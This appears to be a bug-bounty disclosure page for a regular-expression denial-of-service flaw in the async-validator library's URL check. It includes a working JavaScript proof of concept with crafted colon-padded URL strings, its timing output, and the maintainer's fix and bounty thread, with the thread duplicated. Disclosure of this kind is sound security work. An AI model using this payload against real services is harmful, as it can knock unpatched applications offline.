We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

/

Inefficient Regular Expression Complexity in yiminghe/async-validator

Valid

Reported on

Sep 12th 2021

✍️ Description

It allows cause a denial of service when validating crafted invalid URLs.

🕵️‍♂️ Proof of Concept

// PoC.js
var asyncValidator = require("async-validator")

const validator =  new asyncValidator.default({
    v: {
        type: 'url',
      },
    })
 
 
 for(var i = 1; i <= 50000; i++) {
   var time = Date.now();
   var attack_str = '//' + ':'.repeat(i*10000) + '@';
   validator.validate({
        v: attack_str,
      });  
   var time_cost = Date.now() - time;
   console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}

💥 The Output

attack_str.length: 10003: 203 ms
attack_str.length: 20003: 612 ms
attack_str.length: 30003: 1316 ms
attack_str.length: 40003: 2337 ms
attack_str.length: 50003: 3656 ms
attack_str.length: 60003: 5264 ms
attack_str.length: 70003: 7158 ms
attack_str.length: 80003: 9350 ms
attack_str.length: 90003: 11906 ms
attack_str.length: 100003: 14648 ms

Occurrences

type.ts L10

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago

Yeting Li submitted a

2 years ago

We have contacted a member of the yiminghe/async-validator team and are waiting to hear back 2 years ago

commented 2 years ago

Maintainer

https://github.com/yiminghe/async-validator/commit/0e9a1640aef674f6b6bdc177e8ea405724aa4fb4

yiminghe validated this vulnerability 2 years ago

Yeting Li has been awarded the disclosure bounty

The fix bounty is now up for grabs

yiminghe marked this as fixed with commit 0e9a16 2 years ago

Yeting Li has been awarded the fix bounty

This vulnerability will not receive a CVE

type.ts#L10 has been validated

commented 2 years ago

Researcher

Hi @admin, can you assign a CVE?

commented 2 years ago

Admin

As mentioned in the other report, we no longer assign CVEs against this vulnerability type.

to join this conversation

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago

Yeting Li submitted a

2 years ago

We have contacted a member of the yiminghe/async-validator team and are waiting to hear back 2 years ago

commented 2 years ago

Maintainer

https://github.com/yiminghe/async-validator/commit/0e9a1640aef674f6b6bdc177e8ea405724aa4fb4

yiminghe validated this vulnerability 2 years ago

Yeting Li has been awarded the disclosure bounty

The fix bounty is now up for grabs

yiminghe marked this as fixed with commit 0e9a16 2 years ago

Yeting Li has been awarded the fix bounty

This vulnerability will not receive a CVE

type.ts#L10 has been validated

commented 2 years ago

Researcher

Hi @admin, can you assign a CVE?

commented 2 years ago

Admin

As mentioned in the other report, we no longer assign CVEs against this vulnerability type.

to join this conversation